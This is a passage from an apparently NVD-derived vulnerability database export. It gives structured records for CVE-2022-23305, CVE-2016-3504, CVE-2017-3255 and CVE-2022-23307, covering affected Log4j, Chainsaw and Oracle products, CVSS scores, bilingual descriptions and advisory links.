vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "Por diseño, el JDBCAppender en Log4j versiones 1.2.x, acepta una sentencia SQL como parámetro de configuración donde los valores a insertar son convertidores de PatternLayout. Es probable que el convertidor de mensajes, %m, sea incluido siempre. Esto permite a atacantes manipular el SQL introduciendo cadenas diseñadas en los campos de entrada o en los encabezados de una aplicación que son registradas permitiendo una ejecución de consultas SQL no deseadas. Tenga en cuenta que este problema sólo afecta a Log4j versiones 1.x cuando es configurado específicamente para usar el JDBCAppender, que no es el predeterminado. A partir de la versión 2.0-beta8, fue reintroducido el JDBCAppender con soporte apropiado para consultas SQL parametrizadas y mayor personalización sobre las columnas escritas en los registros. Apache Log4j versiones 1.2 llegó al final de su vida útil en agosto de 2015. Los usuarios deberían actualizar a Log4j 2, ya que aborda numerosos problemas de las versiones anteriores", }, ], id: "CVE-2022-23305", lastModified: "2024-11-21T06:48:22.517", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 6.8, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-01-18T16:15:08.350", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { source: "security@apache.org", tags: [ "Issue Tracking", "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-89", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-89", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2016-07-21 10:12
Modified
2025-04-12 10:46
Severity ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 11.1.1.7.0 | |
| oracle | jdeveloper | 11.1.1.9.0 | |
| oracle | jdeveloper | 11.1.2.4.0 | |
| oracle | jdeveloper | 12.1.3.0.0 | |
| oracle | jdeveloper | 12.2.1.0.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "204CEEBC-3D7C-483D-99D6-264EEFAE968C", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y 12.2.1.0.0 permite a atacantes remotos afectar la confidencialidad, la integridad y la disponibilidad a través de vectores relacionados con ADF Faces.", }, ], id: "CVE-2016-3504", lastModified: "2025-04-12T10:46:40.837", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2016-07-21T10:12:57.557", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/91787", }, { source: "secalert_us@oracle.com", url: "http://www.securityfocus.com/bid/92023", }, { source: "secalert_us@oracle.com", url: "http://www.securitytracker.com/id/1036370", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/91787", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securityfocus.com/bid/92023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id/1036370", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2017-01-27 22:59
Modified
2025-04-20 01:37
Severity ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 11.1.1.7.0 | |
| oracle | jdeveloper | 11.1.1.9.0 | |
| oracle | jdeveloper | 11.1.2.4.0 | |
| oracle | jdeveloper | 12.1.3.0.0 | |
| oracle | jdeveloper | 12.2.1.0.0 | |
| oracle | jdeveloper | 12.2.1.1.0 | |
| oracle | jdeveloper | 12.2.1.2.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "204CEEBC-3D7C-483D-99D6-264EEFAE968C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.1.0:*:*:*:*:*:*:*", matchCriteriaId: "0061C130-67E8-45CD-8463-15D6661419AD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", matchCriteriaId: "739DC3EA-E25A-449B-8468-9A65AECC47C4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: ADF Faces). Versiones compatibles que están afectadas son 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 y 12.2.1.2.0. Vulnerabilidad fácilmente explotable permite a atacantes no autenticados con acceso a la red a través de HTTP, comprometer Oracle JDeveloper. Mientras la vulnerabilidad esté en Oracle JDeveloper, los ataques podrían afectar significativamente a productos adicionales. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle JDeveloper. CVSS v3.0 Base Score 5.8 (Impactos de Confidencialidad).", }, ], id: "CVE-2017-3255", lastModified: "2025-04-20T01:37:25.860", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 1.4, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2017-01-27T22:59:02.757", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/95543", }, { source: "secalert_us@oracle.com", url: "http://www.securitytracker.com/id/1037631", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/95543", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id/1037631", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "CWE-200", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2022-01-18 16:15
Modified
2024-11-21 06:48
Severity ?
Summary
CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| security@apache.org | https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | Mailing List, Vendor Advisory | |
| security@apache.org | https://logging.apache.org/log4j/1.2/index.html | Vendor Advisory | |
| security@apache.org | https://www.oracle.com/security-alerts/cpuapr2022.html | Patch, Third Party Advisory | |
| security@apache.org | https://www.oracle.com/security-alerts/cpujul2022.html | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://logging.apache.org/log4j/1.2/index.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpuapr2022.html | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpujul2022.html | Patch, Third Party Advisory |
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:chainsaw:*:*:*:*:*:*:*:*", matchCriteriaId: "4A0D9BED-411E-4E62-A281-237D3C90FFEB", versionEndExcluding: "2.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "56EF3EFE-3632-4CDD-90EF-D2E614E05886", versionEndExcluding: "2.0", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "EB681829-2B2A-4BDB-8DC5-B3C7D359F4C5", versionEndExcluding: "1.2.18.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, { lang: "es", value: "CVE-2020-9493 identificó un problema de deserialización presente en Apache Chainsaw. Versiones anteriores a Chainsaw V2.0 Chainsaw era un componente de Apache Log4j versiones 1.2.x donde se presenta el mismo problema", }, ], id: "CVE-2022-23307", lastModified: "2024-11-21T06:48:22.733", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", integrityImpact: "COMPLETE", vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C", version: "2.0", }, exploitabilityScore: 8, impactScore: 10, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-01-18T16:15:08.403", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: 